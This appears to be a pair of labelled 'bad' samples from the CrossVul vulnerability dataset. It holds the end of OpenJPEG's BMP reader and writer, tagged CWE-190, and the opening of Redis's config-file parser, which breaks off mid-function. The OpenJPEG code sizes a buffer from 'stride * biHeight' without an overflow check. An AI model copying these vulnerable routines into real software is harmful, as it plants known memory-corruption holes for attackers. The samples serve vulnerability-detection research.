lut_B[i] = (OPJ_UINT8)getc(IN);
lut_G[i] = (OPJ_UINT8)getc(IN);
lut_R[i] = (OPJ_UINT8)getc(IN);
(void)getc(IN); /* padding */
has_color |= (lut_B[i] ^ lut_G[i]) | (lut_G[i] ^ lut_R[i]);
}
if(has_color) {
numcmpts = 3U;
}
}
} else {
numcmpts = 3U;
if ((Info_h.biCompression == 3) && (Info_h.biAlphaMask != 0U)) {
numcmpts++;
}
}
stride = ((Info_h.biWidth * Info_h.biBitCount + 31U) / 32U) * 4U; /* rows are aligned on 32bits */
if (Info_h.biBitCount == 4 && Info_h.biCompression == 2) { /* RLE 4 gets decoded as 8 bits data for now... */
stride = ((Info_h.biWidth * 8U + 31U) / 32U) * 4U;
}
pData = (OPJ_UINT8 *) calloc(1, stride * Info_h.biHeight * sizeof(OPJ_UINT8));
if (pData == NULL) {
fclose(IN);
return NULL;
}
/* Place the cursor at the beginning of the image information */
fseek(IN, 0, SEEK_SET);
fseek(IN, (long)File_h.bfOffBits, SEEK_SET);
switch (Info_h.biCompression) {
case 0:
case 3:
/* read raw data */
l_result = bmp_read_raw_data(IN, pData, stride, Info_h.biWidth, Info_h.biHeight);
break;
case 1:
/* read rle8 data */
l_result = bmp_read_rle8_data(IN, pData, stride, Info_h.biWidth, Info_h.biHeight);
break;
case 2:
/* read rle4 data */
l_result = bmp_read_rle4_data(IN, pData, stride, Info_h.biWidth, Info_h.biHeight);
break;
default:
fprintf(stderr, "Unsupported BMP compression\n");
l_result = OPJ_FALSE;
break;
}
if (!l_result) {
free(pData);
fclose(IN);
return NULL;
}
/* create the image */
memset(&cmptparm[0], 0, sizeof(cmptparm));
for(i = 0; i < 4U; i++)
{
cmptparm[i].prec = 8;
cmptparm[i].bpp = 8;
cmptparm[i].sgnd = 0;
cmptparm[i].dx = (OPJ_UINT32)parameters->subsampling_dx;
cmptparm[i].dy = (OPJ_UINT32)parameters->subsampling_dy;
cmptparm[i].w = Info_h.biWidth;
cmptparm[i].h = Info_h.biHeight;
}
image = opj_image_create(numcmpts, &cmptparm[0], (numcmpts == 1U) ? OPJ_CLRSPC_GRAY : OPJ_CLRSPC_SRGB);
if(!image) {
fclose(IN);
free(pData);
return NULL;
}
if (numcmpts == 4U) {
image->comps[3].alpha = 1;
}
/* set image offset and reference grid */
image->x0 = (OPJ_UINT32)parameters->image_offset_x0;
image->y0 = (OPJ_UINT32)parameters->image_offset_y0;
image->x1 = image->x0 + (Info_h.biWidth - 1U) * (OPJ_UINT32)parameters->subsampling_dx + 1U;
image->y1 = image->y0 + (Info_h.biHeight - 1U) * (OPJ_UINT32)parameters->subsampling_dy + 1U;
/* Read the data */
if (Info_h.biBitCount == 24 && Info_h.biCompression == 0) { /*RGB */
bmp24toimage(pData, stride, image);
}
else if (Info_h.biBitCount == 8 && Info_h.biCompression == 0) { /* RGB 8bpp Indexed */
bmp8toimage(pData, stride, image, pLUT);
}
else if (Info_h.biBitCount == 8 && Info_h.biCompression == 1) { /*RLE8*/
bmp8toimage(pData, stride, image, pLUT);
}
else if (Info_h.biBitCount == 4 && Info_h.biCompression == 2) { /*RLE4*/
bmp8toimage(pData, stride, image, pLUT); /* RLE 4 gets decoded as 8 bits data for now */
}
else if (Info_h.biBitCount == 32 && Info_h.biCompression == 0) { /* RGBX */
bmpmask32toimage(pData, stride, image, 0x00FF0000U, 0x0000FF00U, 0x000000FFU, 0x00000000U);
}
else if (Info_h.biBitCount == 32 && Info_h.biCompression == 3) { /* bitmask */
bmpmask32toimage(pData, stride, image, Info_h.biRedMask, Info_h.biGreenMask, Info_h.biBlueMask, Info_h.biAlphaMask);
}
else if (Info_h.biBitCount == 16 && Info_h.biCompression == 0) { /* RGBX */
bmpmask16toimage(pData, stride, image, 0x7C00U, 0x03E0U, 0x001FU, 0x0000U);
}
else if (Info_h.biBitCount == 16 && Info_h.biCompression == 3) { /* bitmask */
if ((Info_h.biRedMask == 0U) && (Info_h.biGreenMask == 0U) && (Info_h.biBlueMask == 0U)) {
Info_h.biRedMask = 0xF800U;
Info_h.biGreenMask = 0x07E0U;
Info_h.biBlueMask = 0x001FU;
}
bmpmask16toimage(pData, stride, image, Info_h.biRedMask, Info_h.biGreenMask, Info_h.biBlueMask, Info_h.biAlphaMask);
}
else {
opj_image_destroy(image);
image = NULL;
fprintf(stderr, "Other system than 24 bits/pixels or 8 bits (no RLE coding) is not yet implemented [%d]\n", Info_h.biBitCount);
}
free(pData);
fclose(IN);
return image;
}
int imagetobmp(opj_image_t * image, const char *outfile) {
int w, h;
int i, pad;
FILE *fdest = NULL;
int adjustR, adjustG, adjustB;
if (image->comps[0].prec < 8) {
fprintf(stderr, "Unsupported number of components: %d\n", image->comps[0].prec);
return 1;
}
if (image->numcomps >= 3 && image->comps[0].dx == image->comps[1].dx
&& image->comps[1].dx == image->comps[2].dx
&& image->comps[0].dy == image->comps[1].dy
&& image->comps[1].dy == image->comps[2].dy
&& image->comps[0].prec == image->comps[1].prec
&& image->comps[1].prec == image->comps[2].prec) {
/* -->> -->> -->> -->>
24 bits color
<<-- <<-- <<-- <<-- */
fdest = fopen(outfile, "wb");
if (!fdest) {
fprintf(stderr, "ERROR -> failed to open %s for writing\n", outfile);
return 1;
}
w = (int)image->comps[0].w;
h = (int)image->comps[0].h;
fprintf(fdest, "BM");
/* FILE HEADER */
/* ------------- */
fprintf(fdest, "%c%c%c%c",
(OPJ_UINT8) (h * w * 3 + 3 * h * (w % 2) + 54) & 0xff,
(OPJ_UINT8) ((h * w * 3 + 3 * h * (w % 2) + 54) >> 8) & 0xff,
(OPJ_UINT8) ((h * w * 3 + 3 * h * (w % 2) + 54) >> 16) & 0xff,
(OPJ_UINT8) ((h * w * 3 + 3 * h * (w % 2) + 54) >> 24) & 0xff);
fprintf(fdest, "%c%c%c%c", (0) & 0xff, ((0) >> 8) & 0xff, ((0) >> 16) & 0xff, ((0) >> 24) & 0xff);
fprintf(fdest, "%c%c%c%c", (54) & 0xff, ((54) >> 8) & 0xff,((54) >> 16) & 0xff, ((54) >> 24) & 0xff);
/* INFO HEADER */
/* ------------- */
fprintf(fdest, "%c%c%c%c", (40) & 0xff, ((40) >> 8) & 0xff, ((40) >> 16) & 0xff, ((40) >> 24) & 0xff);
fprintf(fdest, "%c%c%c%c", (OPJ_UINT8) ((w) & 0xff),
(OPJ_UINT8) ((w) >> 8) & 0xff,
(OPJ_UINT8) ((w) >> 16) & 0xff,
(OPJ_UINT8) ((w) >> 24) & 0xff);
fprintf(fdest, "%c%c%c%c", (OPJ_UINT8) ((h) & 0xff),
(OPJ_UINT8) ((h) >> 8) & 0xff,
(OPJ_UINT8) ((h) >> 16) & 0xff,
(OPJ_UINT8) ((h) >> 24) & 0xff);
fprintf(fdest, "%c%c", (1) & 0xff, ((1) >> 8) & 0xff);
fprintf(fdest, "%c%c", (24) & 0xff, ((24) >> 8) & 0xff);
fprintf(fdest, "%c%c%c%c", (0) & 0xff, ((0) >> 8) & 0xff, ((0) >> 16) & 0xff, ((0) >> 24) & 0xff);
fprintf(fdest, "%c%c%c%c", (OPJ_UINT8) (3 * h * w + 3 * h * (w % 2)) & 0xff,
(OPJ_UINT8) ((h * w * 3 + 3 * h * (w % 2)) >> 8) & 0xff,
(OPJ_UINT8) ((h * w * 3 + 3 * h * (w % 2)) >> 16) & 0xff,
(OPJ_UINT8) ((h * w * 3 + 3 * h * (w % 2)) >> 24) & 0xff);
fprintf(fdest, "%c%c%c%c", (7834) & 0xff, ((7834) >> 8) & 0xff, ((7834) >> 16) & 0xff, ((7834) >> 24) & 0xff);
fprintf(fdest, "%c%c%c%c", (7834) & 0xff, ((7834) >> 8) & 0xff, ((7834) >> 16) & 0xff, ((7834) >> 24) & 0xff);
fprintf(fdest, "%c%c%c%c", (0) & 0xff, ((0) >> 8) & 0xff, ((0) >> 16) & 0xff, ((0) >> 24) & 0xff);
fprintf(fdest, "%c%c%c%c", (0) & 0xff, ((0) >> 8) & 0xff, ((0) >> 16) & 0xff, ((0) >> 24) & 0xff);
if (image->comps[0].prec > 8) {
adjustR = (int)image->comps[0].prec - 8;
printf("BMP CONVERSION: Truncating component 0 from %d bits to 8 bits\n", image->comps[0].prec);
}
else
adjustR = 0;
if (image->comps[1].prec > 8) {
adjustG = (int)image->comps[1].prec - 8;
printf("BMP CONVERSION: Truncating component 1 from %d bits to 8 bits\n", image->comps[1].prec);
}
else
adjustG = 0;
if (image->comps[2].prec > 8) {
adjustB = (int)image->comps[2].prec - 8;
printf("BMP CONVERSION: Truncating component 2 from %d bits to 8 bits\n", image->comps[2].prec);
}
else
adjustB = 0;
for (i = 0; i < w * h; i++) {
OPJ_UINT8 rc, gc, bc;
int r, g, b;
r = image->comps[0].data[w * h - ((i) / (w) + 1) * w + (i) % (w)];
r += (image->comps[0].sgnd ? 1 << (image->comps[0].prec - 1) : 0);
r = ((r >> adjustR)+((r >> (adjustR-1))%2));
if(r > 255) r = 255; else if(r < 0) r = 0;
rc = (OPJ_UINT8)r;
g = image->comps[1].data[w * h - ((i) / (w) + 1) * w + (i) % (w)];
g += (image->comps[1].sgnd ? 1 << (image->comps[1].prec - 1) : 0);
g = ((g >> adjustG)+((g >> (adjustG-1))%2));
if(g > 255) g = 255; else if(g < 0) g = 0;
gc = (OPJ_UINT8)g;
b = image->comps[2].data[w * h - ((i) / (w) + 1) * w + (i) % (w)];
b += (image->comps[2].sgnd ? 1 << (image->comps[2].prec - 1) : 0);
b = ((b >> adjustB)+((b >> (adjustB-1))%2));
if(b > 255) b = 255; else if(b < 0) b = 0;
bc = (OPJ_UINT8)b;
fprintf(fdest, "%c%c%c", bc, gc, rc);
if ((i + 1) % w == 0) {
for (pad = ((3 * w) % 4) ? (4 - (3 * w) % 4) : 0; pad > 0; pad--) /* ADD */
fprintf(fdest, "%c", 0);
}
}
fclose(fdest);
} else { /* Gray-scale */
/* -->> -->> -->> -->>
8 bits non code (Gray scale)
<<-- <<-- <<-- <<-- */
fdest = fopen(outfile, "wb");
if (!fdest) {
fprintf(stderr, "ERROR -> failed to open %s for writing\n", outfile);
return 1;
}
w = (int)image->comps[0].w;
h = (int)image->comps[0].h;
fprintf(fdest, "BM");
/* FILE HEADER */
/* ------------- */
fprintf(fdest, "%c%c%c%c", (OPJ_UINT8) (h * w + 54 + 1024 + h * (w % 2)) & 0xff,
(OPJ_UINT8) ((h * w + 54 + 1024 + h * (w % 2)) >> 8) & 0xff,
(OPJ_UINT8) ((h * w + 54 + 1024 + h * (w % 2)) >> 16) & 0xff,
(OPJ_UINT8) ((h * w + 54 + 1024 + w * (w % 2)) >> 24) & 0xff);
fprintf(fdest, "%c%c%c%c", (0) & 0xff, ((0) >> 8) & 0xff, ((0) >> 16) & 0xff, ((0) >> 24) & 0xff);
fprintf(fdest, "%c%c%c%c", (54 + 1024) & 0xff, ((54 + 1024) >> 8) & 0xff,
((54 + 1024) >> 16) & 0xff,
((54 + 1024) >> 24) & 0xff);
/* INFO HEADER */
/* ------------- */
fprintf(fdest, "%c%c%c%c", (40) & 0xff, ((40) >> 8) & 0xff, ((40) >> 16) & 0xff, ((40) >> 24) & 0xff);
fprintf(fdest, "%c%c%c%c", (OPJ_UINT8) ((w) & 0xff),
(OPJ_UINT8) ((w) >> 8) & 0xff,
(OPJ_UINT8) ((w) >> 16) & 0xff,
(OPJ_UINT8) ((w) >> 24) & 0xff);
fprintf(fdest, "%c%c%c%c", (OPJ_UINT8) ((h) & 0xff),
(OPJ_UINT8) ((h) >> 8) & 0xff,
(OPJ_UINT8) ((h) >> 16) & 0xff,
(OPJ_UINT8) ((h) >> 24) & 0xff);
fprintf(fdest, "%c%c", (1) & 0xff, ((1) >> 8) & 0xff);
fprintf(fdest, "%c%c", (8) & 0xff, ((8) >> 8) & 0xff);
fprintf(fdest, "%c%c%c%c", (0) & 0xff, ((0) >> 8) & 0xff, ((0) >> 16) & 0xff, ((0) >> 24) & 0xff);
fprintf(fdest, "%c%c%c%c", (OPJ_UINT8) (h * w + h * (w % 2)) & 0xff,
(OPJ_UINT8) ((h * w + h * (w % 2)) >> 8) & 0xff,
(OPJ_UINT8) ((h * w + h * (w % 2)) >> 16) & 0xff,
(OPJ_UINT8) ((h * w + h * (w % 2)) >> 24) & 0xff);
fprintf(fdest, "%c%c%c%c", (7834) & 0xff, ((7834) >> 8) & 0xff, ((7834) >> 16) & 0xff, ((7834) >> 24) & 0xff);
fprintf(fdest, "%c%c%c%c", (7834) & 0xff, ((7834) >> 8) & 0xff, ((7834) >> 16) & 0xff, ((7834) >> 24) & 0xff);
fprintf(fdest, "%c%c%c%c", (256) & 0xff, ((256) >> 8) & 0xff, ((256) >> 16) & 0xff, ((256) >> 24) & 0xff);
fprintf(fdest, "%c%c%c%c", (256) & 0xff, ((256) >> 8) & 0xff, ((256) >> 16) & 0xff, ((256) >> 24) & 0xff);
if (image->comps[0].prec > 8) {
adjustR = (int)image->comps[0].prec - 8;
printf("BMP CONVERSION: Truncating component 0 from %d bits to 8 bits\n", image->comps[0].prec);
}else
adjustR = 0;
for (i = 0; i < 256; i++) {
fprintf(fdest, "%c%c%c%c", i, i, i, 0);
}
for (i = 0; i < w * h; i++) {
int r;
r = image->comps[0].data[w * h - ((i) / (w) + 1) * w + (i) % (w)];
r += (image->comps[0].sgnd ? 1 << (image->comps[0].prec - 1) : 0);
r = ((r >> adjustR)+((r >> (adjustR-1))%2));
if(r > 255) r = 255; else if(r < 0) r = 0;
fprintf(fdest, "%c", (OPJ_UINT8)r);
if ((i + 1) % w == 0) {
for (pad = (w % 4) ? (4 - w % 4) : 0; pad > 0; pad--) /* ADD */
fprintf(fdest, "%c", 0);
}
}
fclose(fdest);
}
return 0;
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_4867_0 |
crossvul-cpp_data_bad_1943_0 | /* Configuration file parsing and CONFIG GET/SET commands implementation.
*
* Copyright (c) 2009-2012, Salvatore Sanfilippo <antirez at gmail dot com>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* * Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* * Neither the name of Redis nor the names of its contributors may be used
* to endorse or promote products derived from this software without
* specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
* LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*/
#include "server.h"
#include "cluster.h"
#include <fcntl.h>
#include <sys/stat.h>
/*-----------------------------------------------------------------------------
* Config file name-value maps.
*----------------------------------------------------------------------------*/
typedef struct configEnum {
const char *name;
const int val;
} configEnum;
configEnum maxmemory_policy_enum[] = {
{"volatile-lru", MAXMEMORY_VOLATILE_LRU},
{"volatile-lfu", MAXMEMORY_VOLATILE_LFU},
{"volatile-random",MAXMEMORY_VOLATILE_RANDOM},
{"volatile-ttl",MAXMEMORY_VOLATILE_TTL},
{"allkeys-lru",MAXMEMORY_ALLKEYS_LRU},
{"allkeys-lfu",MAXMEMORY_ALLKEYS_LFU},
{"allkeys-random",MAXMEMORY_ALLKEYS_RANDOM},
{"noeviction",MAXMEMORY_NO_EVICTION},
{NULL, 0}
};
configEnum syslog_facility_enum[] = {
{"user", LOG_USER},
{"local0", LOG_LOCAL0},
{"local1", LOG_LOCAL1},
{"local2", LOG_LOCAL2},
{"local3", LOG_LOCAL3},
{"local4", LOG_LOCAL4},
{"local5", LOG_LOCAL5},
{"local6", LOG_LOCAL6},
{"local7", LOG_LOCAL7},
{NULL, 0}
};
configEnum loglevel_enum[] = {
{"debug", LL_DEBUG},
{"verbose", LL_VERBOSE},
{"notice", LL_NOTICE},
{"warning", LL_WARNING},
{NULL,0}
};
configEnum supervised_mode_enum[] = {
{"upstart", SUPERVISED_UPSTART},
{"systemd", SUPERVISED_SYSTEMD},
{"auto", SUPERVISED_AUTODETECT},
{"no", SUPERVISED_NONE},
{NULL, 0}
};
configEnum aof_fsync_enum[] = {
{"everysec", AOF_FSYNC_EVERYSEC},
{"always", AOF_FSYNC_ALWAYS},
{"no", AOF_FSYNC_NO},
{NULL, 0}
};
configEnum repl_diskless_load_enum[] = {
{"disabled", REPL_DISKLESS_LOAD_DISABLED},
{"on-empty-db", REPL_DISKLESS_LOAD_WHEN_DB_EMPTY},
{"swapdb", REPL_DISKLESS_LOAD_SWAPDB},
{NULL, 0}
};
configEnum tls_auth_clients_enum[] = {
{"no", TLS_CLIENT_AUTH_NO},
{"yes", TLS_CLIENT_AUTH_YES},
{"optional", TLS_CLIENT_AUTH_OPTIONAL},
{NULL, 0}
};
configEnum oom_score_adj_enum[] = {
{"no", OOM_SCORE_ADJ_NO},
{"yes", OOM_SCORE_RELATIVE},
{"relative", OOM_SCORE_RELATIVE},
{"absolute", OOM_SCORE_ADJ_ABSOLUTE},
{NULL, 0}
};
/* Output buffer limits presets. */
clientBufferLimitsConfig clientBufferLimitsDefaults[CLIENT_TYPE_OBUF_COUNT] = {
{0, 0, 0}, /* normal */
{1024*1024*256, 1024*1024*64, 60}, /* slave */
{1024*1024*32, 1024*1024*8, 60} /* pubsub */
};
/* OOM Score defaults */
int configOOMScoreAdjValuesDefaults[CONFIG_OOM_COUNT] = { 0, 200, 800 };
/* Generic config infrastructure function pointers
* int is_valid_fn(val, err)
* Return 1 when val is valid, and 0 when invalid.
* Optionally set err to a static error string.
* int update_fn(val, prev, err)
* This function is called only for CONFIG SET command (not at config file parsing)
* It is called after the actual config is applied,
* Return 1 for success, and 0 for failure.
* Optionally set err to a static error string.
* On failure the config change will be reverted.
*/
/* Configuration values that require no special handling to set, get, load or
* rewrite. */
typedef struct boolConfigData {
int *config; /* The pointer to the server config this value is stored in */
const int default_value; /* The default value of the config on rewrite */
int (*is_valid_fn)(int val, char **err); /* Optional function to check validity of new value (generic doc above) */
int (*update_fn)(int val, int prev, char **err); /* Optional function to apply new value at runtime (generic doc above) */
} boolConfigData;
typedef struct stringConfigData {
char **config; /* Pointer to the server config this value is stored in. */
const char *default_value; /* Default value of the config on rewrite. */
int (*is_valid_fn)(char* val, char **err); /* Optional function to check validity of new value (generic doc above) */
int (*update_fn)(char* val, char* prev, char **err); /* Optional function to apply new value at runtime (generic doc above) */
int convert_empty_to_null; /* Boolean indicating if empty strings should
be stored as a NULL value. */
} stringConfigData;
typedef struct enumConfigData {
int *config; /* The pointer to the server config this value is stored in */
configEnum *enum_value; /* The underlying enum type this data represents */
const int default_value; /* The default value of the config on rewrite */
int (*is_valid_fn)(int val, char **err); /* Optional function to check validity of new value (generic doc above) */
int (*update_fn)(int val, int prev, char **err); /* Optional function to apply new value at runtime (generic doc above) */
} enumConfigData;
typedef enum numericType {
NUMERIC_TYPE_INT,
NUMERIC_TYPE_UINT,
NUMERIC_TYPE_LONG,
NUMERIC_TYPE_ULONG,
NUMERIC_TYPE_LONG_LONG,
NUMERIC_TYPE_ULONG_LONG,
NUMERIC_TYPE_SIZE_T,
NUMERIC_TYPE_SSIZE_T,
NUMERIC_TYPE_OFF_T,
NUMERIC_TYPE_TIME_T,
} numericType;
typedef struct numericConfigData {
union {
int *i;
unsigned int *ui;
long *l;
unsigned long *ul;
long long *ll;
unsigned long long *ull;
size_t *st;
ssize_t *sst;
off_t *ot;
time_t *tt;
} config; /* The pointer to the numeric config this value is stored in */
int is_memory; /* Indicates if this value can be loaded as a memory value */
numericType numeric_type; /* An enum indicating the type of this value */
long long lower_bound; /* The lower bound of this numeric value */
long long upper_bound; /* The upper bound of this numeric value */
const long long default_value; /* The default value of the config on rewrite */
int (*is_valid_fn)(long long val, char **err); /* Optional function to check validity of new value (generic doc above) */
int (*update_fn)(long long val, long long prev, char **err); /* Optional function to apply new value at runtime (generic doc above) */
} numericConfigData;
typedef union typeData {
boolConfigData yesno;
stringConfigData string;
enumConfigData enumd;
numericConfigData numeric;
} typeData;
typedef struct typeInterface {
/* Called on server start, to init the server with default value */
void (*init)(typeData data);
/* Called on server start, should return 1 on success, 0 on error and should set err */
int (*load)(typeData data, sds *argc, int argv, char **err);
/* Called on server startup and CONFIG SET, returns 1 on success, 0 on error
* and can set a verbose err string, update is true when called from CONFIG SET */
int (*set)(typeData data, sds value, int update, char **err);
/* Called on CONFIG GET, required to add output to the client */
void (*get)(client *c, typeData data);
/* Called on CONFIG REWRITE, required to rewrite the config state */
void (*rewrite)(typeData data, const char *name, struct rewriteConfigState *state);
} typeInterface;
typedef struct standardConfig {
const char *name; /* The user visible name of this config */
const char *alias; /* An alias that can also be used for this config */
const int modifiable; /* Can this value be updated by CONFIG SET? */
typeInterface interface; /* The function pointers that define the type interface */
typeData data; /* The type specific data exposed used by the interface */
} standardConfig;
standardConfig configs[];
/*-----------------------------------------------------------------------------
* Enum access functions
*----------------------------------------------------------------------------*/
/* Get enum value from name. If there is no match INT_MIN is returned. */
int configEnumGetValue(configEnum *ce, char *name) {
while(ce->name != NULL) {
if (!strcasecmp(ce->name,name)) return ce->val;
ce++;
}
return INT_MIN;
}
/* Get enum name from value. If no match is found NULL is returned. */
const char *configEnumGetName(configEnum *ce, int val) {
while(ce->name != NULL) {
if (ce->val == val) return ce->name;
ce++;
}
return NULL;
}
/* Wrapper for configEnumGetName() returning "unknown" instead of NULL if
* there is no match. */
const char *configEnumGetNameOrUnknown(configEnum *ce, int val) {
const char *name = configEnumGetName(ce,val);
return name ? name : "unknown";
}
/* Used for INFO generation. */
const char *evictPolicyToString(void) {
return configEnumGetNameOrUnknown(maxmemory_policy_enum,server.maxmemory_policy);
}
/*-----------------------------------------------------------------------------
* Config file parsing
*----------------------------------------------------------------------------*/
int yesnotoi(char *s) {
if (!strcasecmp(s,"yes")) return 1;
else if (!strcasecmp(s,"no")) return 0;
else return -1;
}
void appendServerSaveParams(time_t seconds, int changes) {
server.saveparams = zrealloc(server.saveparams,sizeof(struct saveparam)*(server.saveparamslen+1));
server.saveparams[server.saveparamslen].seconds = seconds;
server.saveparams[server.saveparamslen].changes = changes;
server.saveparamslen++;
}
void resetServerSaveParams(void) {
zfree(server.saveparams);
server.saveparams = NULL;
server.saveparamslen = 0;
}
void queueLoadModule(sds path, sds *argv, int argc) {
int i;
struct moduleLoadQueueEntry *loadmod;
loadmod = zmalloc(sizeof(struct moduleLoadQueueEntry));
loadmod->argv = zmalloc(sizeof(robj*)*argc);
loadmod->path = sdsnew(path);
loadmod->argc = argc;
for (i = 0; i < argc; i++) {
loadmod->argv[i] = createRawStringObject(argv[i],sdslen(argv[i]));
}
listAddNodeTail(server.loadmodule_queue,loadmod);
}
/* Parse an array of CONFIG_OOM_COUNT sds strings, validate and populate
* server.oom_score_adj_values if valid.
*/
static int updateOOMScoreAdjValues(sds *args, char **err, int apply) {
int i;
int values[CONFIG_OOM_COUNT];
for (i = 0; i < CONFIG_OOM_COUNT; i++) {
char *eptr;
long long val = strtoll(args[i], &eptr, 10);
if (*eptr != '\0' || val < -2000 || val > 2000) {
if (err) *err = "Invalid oom-score-adj-values, elements must be between -2000 and 2000.";
return C_ERR;
}
values[i] = val;
}
/* Verify that the values make sense. If they don't omit a warning but
* keep the configuration, which may still be valid for privileged processes.
*/
if (values[CONFIG_OOM_REPLICA] < values[CONFIG_OOM_MASTER] ||
values[CONFIG_OOM_BGCHILD] < values[CONFIG_OOM_REPLICA]) {
serverLog(LOG_WARNING,
"The oom-score-adj-values configuration may not work for non-privileged processes! "
"Please consult the documentation.");
}
/* Store values, retain previous config for rollback in case we fail. */
int old_values[CONFIG_OOM_COUNT];
for (i = 0; i < CONFIG_OOM_COUNT; i++) {
old_values[i] = server.oom_score_adj_values[i];
server.oom_score_adj_values[i] = values[i];
}
/* When parsing the config file, we want to apply only when all is done. */
if (!apply)
return C_OK;
/* Update */
if (setOOMScoreAdj(-1) == C_ERR) {
/* Roll back */
for (i = 0; i < CONFIG_OOM_COUNT; i++)
server.oom_score_adj_values[i] = old_values[i];
if (err)
*err = "Failed to apply oom-score-adj-values configuration, check server logs.";
return C_ERR;
}
return C_OK;
}
void initConfigValues() {
for (standardConfig *config = configs; config->name != NULL; config++) {
config->interface.init(config->data);
}
}
void loadServerConfigFromString(char *config) {
char *err = NULL;
int linenum = 0, totlines, i;
int slaveof_linenum = 0;
sds *lines;
lines = sdssplitlen(config,strlen(config),"\n",1,&totlines);
for (i = 0; i < totlines; i++) {
sds *argv;
int argc;
linenum = i+1;
lines[i] = sdstrim(lines[i]," \t\r\n");
/* Skip comments and blank lines */
if (lines[i][0] == '#' || lines[i][0] == '\0') continue;
/* Split into arguments */
argv = sdssplitargs(lines[i],&argc);
if (argv == NULL) {
err = "Unbalanced quotes in configuration line";
goto loaderr;
}
/* Skip this line if the resulting command vector is empty. */
if (argc == 0) {
sdsfreesplitres(argv,argc);
continue;
}
sdstolower(argv[0]);
/* Iterate the configs that are standard */
int match = 0;
for (standardConfig *config = configs; config->name != NULL; config++) {
if ((!strcasecmp(argv[0],config->name) ||
(config->alias && !strcasecmp(argv[0],config->alias))))
{
if (argc != 2) {
err = "wrong number of arguments";
goto loaderr;
}
if (!config->interface.set(config->data, argv[1], 0, &err)) {
goto loaderr;
}
match = 1;
break;
}
}
if (match) {
sdsfreesplitres(argv,argc);
continue;
}
/* Execute config directives */
if (!strcasecmp(argv[0],"bind") && argc >= 2) {
int j, addresses = argc-1;
if (addresses > CONFIG_BINDADDR_MAX) {
err = "Too many bind addresses specified"; goto loaderr;
}
/* Free old bind addresses */
for (j = 0; j < server.bindaddr_count; j++) {
zfree(server.bindaddr[j]);
}
for (j = 0; j < addresses; j++)
server.bindaddr[j] = zstrdup(argv[j+1]);
server.bindaddr_count = addresses;
} else if (!strcasecmp(argv[0],"unixsocketperm") && argc == 2) {
errno = 0;
server.unixsocketperm = (mode_t)strtol(argv[1], NULL, 8);
if (errno || server.unixsocketperm > 0777) {
err = "Invalid socket file permissions"; goto loaderr;
}
} else if (!strcasecmp(argv[0],"save")) {
if (argc == 3) {
int seconds = atoi(argv[1]);
int changes = atoi(argv[2]);
if (seconds < 1 || changes < 0) {
err = "Invalid save parameters"; goto loaderr;
}
appendServerSaveParams(seconds,changes);
} else if (argc == 2 && !strcasecmp(argv[1],"")) {
resetServerSaveParams();
}
} else if (!strcasecmp(argv[0],"dir") && argc == 2) {
if (chdir(argv[1]) == -1) {
serverLog(LL_WARNING,"Can't chdir to '%s': %s",
argv[1], strerror(errno));
exit(1);
}
} else if (!strcasecmp(argv[0],"logfile") && argc == 2) {
FILE *logfp;
zfree(server.logfile);
server.logfile = zstrdup(argv[1]);
if (server.logfile[0] != '\0') {
/* Test if we are able to open the file. The server will not
* be able to abort just for this problem later... */
logfp = fopen(server.logfile,"a");
if (logfp == NULL) {
err = sdscatprintf(sdsempty(),
"Can't open the log file: %s", strerror(errno));
goto loaderr;
}
fclose(logfp);
}
} else if (!strcasecmp(argv[0],"include") && argc == 2) {
loadServerConfig(argv[1],NULL);
} else if ((!strcasecmp(argv[0],"client-query-buffer-limit")) && argc == 2) {
server.client_max_querybuf_len = memtoll(argv[1],NULL);
} else if ((!strcasecmp(argv[0],"slaveof") ||
!strcasecmp(argv[0],"replicaof")) && argc == 3) {
slaveof_linenum = linenum;
sdsfree(server.masterhost);
if (!strcasecmp(argv[1], "no") && !strcasecmp(argv[2], "one")) {
server.masterhost = NULL;
continue;
}
server.masterhost = sdsnew(argv[1]);
char *ptr;
server.masterport = strtol(argv[2], &ptr, 10);
if (server.masterport < 0 || server.masterport > 65535 || *ptr != '\0') {
err = "Invalid master port"; goto loaderr;
}
server.repl_state = REPL_STATE_CONNECT;
} else if (!strcasecmp(argv[0],"requirepass") && argc == 2) {
if (strlen(argv[1]) > CONFIG_AUTHPASS_MAX_LEN) {
err = "Password is longer than CONFIG_AUTHPASS_MAX_LEN";
goto loaderr;
}
/* The old "requirepass" directive just translates to setting
* a password to the default user. The only thing we do
* additionally is to remember the cleartext password in this
* case, for backward compatibility with Redis <= 5. */
ACLSetUser(DefaultUser,"resetpass",-1);
sdsfree(server.requirepass);
server.requirepass = NULL;
if (sdslen(argv[1])) {
sds aclop = sdscatprintf(sdsempty(),">%s",argv[1]);
ACLSetUser(DefaultUser,aclop,sdslen(aclop));
sdsfree(aclop);
server.requirepass = sdsnew(argv[1]);
} else {
ACLSetUser(DefaultUser,"nopass",-1);
}
} else if (!strcasecmp(argv[0],"list-max-ziplist-entries") && argc == 2){
/* DEAD OPTION */
} else if (!strcasecmp(argv[0],"list-max-ziplist-value") && argc == 2) {
/* DEAD OPTION */
} else if (!strcasecmp(argv[0],"rename-command") && argc == 3) {
struct redisCommand *cmd = lookupCommand(argv[1]);
int retval;
if (!cmd) {
err = "No such command in rename-command";
goto loaderr;
}
/* If the target command name is the empty string we just
